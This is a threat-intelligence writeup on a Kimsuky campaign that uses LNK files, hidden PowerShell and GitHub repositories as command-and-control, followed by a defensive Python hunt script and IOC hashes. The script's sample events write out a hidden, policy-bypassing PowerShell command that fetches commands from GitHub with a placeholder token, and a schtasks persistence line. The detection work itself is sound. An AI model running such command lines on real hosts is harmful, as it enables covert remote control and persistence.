North Korea-Linked Hackers Use GitHub as C2 Infrastructure to Attack South Korea

2026-04-08 Excalibra

https://medium.com/bugbountywriteup/north-korea-linked-hackers-use-github-as-c2-infrastructure-to-attack-south-korea-1bdcbaf9a9d8


FortiGuard Labs identifies a Kimsuky campaign targeting South Korean organizations through phishing-delivered LNK files that abuse GitHub as command-and-control infrastructure. The LNK files display decoy PDFs while running obfuscated PowerShell that performs anti-analysis checks, creates scheduled-task persistence, collects host data, and exfiltrates logs to attacker-controlled GitHub repositories. The same repositories host commands and additional modules, with hardcoded access tokens and accounts such as motoralis, God0808RAMA, Pigresy80, entire73, pandora0009, and brandonleeodd93-blip cited as infrastructure. The excerpt connects the activity to earlier GitHub-based Xeno RAT and MoonPeak reporting and notes a related AhnLab-observed Kimsuky chain that uses Dropbox and ZIP fragments to deploy a Python backdoor. The operational significance is the continued DPRK-linked shift toward trusted platforms, native Windows tooling, and scheduled tasks to reduce detection and sustain access. Because traffic to GitHub is legitimate on many hosts, detection has to rest on the process chain around it (explorer.exe launching hidden or encoded PowerShell, a schtasks child, a token in the command line) rather than on the destination alone.
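The hunt below is an added example, not code from FortiGuard Labs or from this page. It scores the chain the report describes (LNK launch from explorer.exe, hidden or encoded PowerShell, a hardcoded GitHub token, connections to GitHub endpoints, a schtasks /Create child) over constructed Sysmon-style events. The token regex assumes a classic GitHub personal access token (ghp_ plus 36 base62 characters), which the report does not specify; the command lines, task name, and repository path in the sample are invented for the example, and the two-indicator threshold is a design choice, not something from the report.

```python
"""Hunt for the LNK -> PowerShell -> GitHub C2 chain in process/network telemetry.

Added example, not FortiGuard's or the page's own code. Input events mimic
Sysmon EventID 1 (process create) and EventID 3 (network connect) records.
"""
import re
from collections import defaultdict

# GitHub endpoints a script would use to fetch commands or push collected files.
GITHUB_HOSTS = {"github.com", "api.github.com", "raw.githubusercontent.com"}

# Classic GitHub personal access token: "ghp_" + 36 base62 characters.
# Assumption: the report mentions hardcoded tokens but not their format.
GITHUB_PAT_RE = re.compile(r"\bghp_[A-Za-z0-9]{36}\b")

# PowerShell switches typically used to run hidden, unsigned code from an LNK.
PS_EVASION_RE = re.compile(
    r"-(?:enc(?:odedcommand)?|nop(?:rofile)?|noni(?:nteractive)?"
    r"|w(?:indowstyle)?\s+hidden|e(?:xecutionpolicy|p)\s+bypass)\b",
    re.IGNORECASE,
)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt(events, min_indicators=2):
    """Return PowerShell processes that show at least min_indicators of the chain."""
    procs = {e["pid"]: e for e in events if e["event"] == 1}
    net = defaultdict(list)
    for e in events:
        if e["event"] == 3:
            net[e["pid"]].append(e["dst_host"].lower())
    children = defaultdict(list)
    for p in procs.values():
        children[p["ppid"]].append(p)

    findings = []
    for p in procs.values():
        if basename(p["image"]) not in {"powershell.exe", "pwsh.exe"}:
            continue
        indicators = []
        if basename(p["parent"]) == "explorer.exe":
            indicators.append("spawned by explorer.exe (consistent with an LNK launch)")
        if PS_EVASION_RE.search(p["cmd"]):
            indicators.append("hidden/encoded PowerShell switches")
        if GITHUB_PAT_RE.search(p["cmd"]):
            indicators.append("hardcoded GitHub token in command line")
        gh = sorted({h for h in net[p["pid"]] if h in GITHUB_HOSTS})
        if gh:
            indicators.append("connects to " + ", ".join(gh))
        for c in children[p["pid"]]:
            if basename(c["image"]) == "schtasks.exe" and "/create" in c["cmd"].lower():
                indicators.append("creates scheduled task via schtasks.exe")
        if len(indicators) >= min_indicators:
            findings.append({"pid": p["pid"], "cmd": p["cmd"], "indicators": indicators})
    return findings


# Constructed sample telemetry (not from the report). Token, task name and repo
# path are placeholders.
SAMPLE_EVENTS = [
    # Benign developer shell talking to GitHub: one indicator only, not flagged.
    {"event": 1, "pid": 3001, "ppid": 900,
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmd": "pwsh.exe -NoLogo"},
    {"event": 3, "pid": 3001, "dst_host": "api.github.com", "dst_port": 443},
    # LNK double-click: explorer.exe -> hidden PowerShell with a token -> GitHub.
    {"event": 1, "pid": 4102, "ppid": 1200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": "powershell.exe -w hidden -ep bypass -nop -c \"$t='ghp_A1b2C3d4E5f6G7h8I9j0K1l2M3n4O5p6Q7r8'; "
            "iwr -UseBasicParsing -Headers @{Authorization='token '+$t} "
            "https://api.github.com/repos/OWNER/REPO/contents/cmd.txt\""},
    {"event": 3, "pid": 4102, "dst_host": "raw.githubusercontent.com", "dst_port": 443},
    {"event": 3, "pid": 4102, "dst_host": "api.github.com", "dst_port": 443},
    # Persistence: schtasks child of the PowerShell process.
    {"event": 1, "pid": 4110, "ppid": 4102,
     "image": r"C:\Windows\System32\schtasks.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'schtasks.exe /Create /SC MINUTE /MO 30 /TN "UpdateCheck" '
            '/TR "powershell -w hidden -File C:\\Users\\Public\\u.ps1" /F'},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"pid {f['pid']}:")
        for i in f["indicators"]:
            print("  -", i)
```

Run against real Sysmon data, the same logic applies per PowerShell process; the benign pwsh session in the sample is deliberately left at one indicator (GitHub traffic alone) so the threshold, not the destination, decides what is raised.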

Indicators of Compromise

Type  Value                               First Seen  Last Seen
HASH  af0309aa38d067373c54b2a7774a32f…    2026-04-02  2026-04-08
HASH  f20fde3a9381c22034f7ecd4fef2396…    2026-04-02  2026-04-08
HASH  c0866bb72c7a12a0288f434e16ba14e…    2026-04-02  2026-04-08
HASH  9c3f2bd300ad2ef8584cc48adc47aab…    2026-04-02  2026-04-08
HASH  484a16d779d67c7339125ceac10b9ab…    2026-04-02  2026-04-08
